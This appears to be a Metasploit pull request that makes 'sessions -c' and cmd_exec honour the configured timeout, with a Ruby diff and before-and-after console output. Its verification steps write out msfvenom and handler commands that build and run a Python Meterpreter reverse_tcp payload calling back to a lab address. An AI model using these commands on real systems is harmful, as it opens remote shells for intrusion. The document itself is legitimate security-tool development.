### PR TITLE
Fix #15097, fix unreliable sessions -c output

### DIFF
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -95,7 +95,7 @@ module Msf::Post::Common
       end
 
       session.response_timeout = time_out
-      o = session.sys.process.capture_output(cmd, args, {'Hidden' => true, 'Channelized' => true, 'Subshell' => true })
+      o = session.sys.process.capture_output(cmd, args, {'Hidden' => true, 'Channelized' => true, 'Subshell' => true }, time_out)
     when /powershell/
       if args.nil? || args.empty?
         o = session.shell_command("#{cmd}", time_out)

--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1429,11 +1429,11 @@ class Core
               c, c_args = cmd.split(' ', 2)
               begin
                 data = session.sys.process.capture_output(c, c_args,
-                  {
-                    'Channelized' => true,
-                    'Subshell'    => true,
-                    'Hidden'      => true
-                  })
+                {
+                  'Channelized' => true,
+                  'Subshell'    => true,
+                  'Hidden'      => true
+                }, response_timeout)
                 print_line(data) unless data.blank?
               rescue ::Rex::Post::Meterpreter::RequestError
                 print_error("Failed: #{$!.class} #{$!}")


### PR DESCRIPTION
This change ensures `sessions -c` and cmd_exec use the timeout option. Previously this would default to 15 seconds
Well spotted @Funnywolf!!

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a python session
- [x] `handler -p python/meterpreter/reverse_tcp -H 192.168.13.37 -P 4444`
- [x] `./msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.13.37 LPORT=4444 -o met.py && python met.py`
- [x] **Verify** `sessions -t 20 -c 'echo start && sleep 16 && echo end'` now returns end in the output (this would only return `start` before) e.g:
### Before
```
msf6 exploit(multi/handler) > sessions -t 20 -c 'echo start && sleep 16 && echo end'
[*] Running 'echo start && sleep 16 && echo end' on meterpreter session 1 (192.168.13.37)
start
```
### After
```
msf6 exploit(multi/handler) > sessions -t 20 -c 'echo start && sleep 16 && echo end'
[*] Running 'echo start && sleep 16 && echo end' on meterpreter session 1 (192.168.13.37)
start
end
```
- [x] **Verify** the cmd_exec tests still pass, e.g:
```
loadpath test/modules
use post/test/cmd_exec
set SESSION -1
run
```
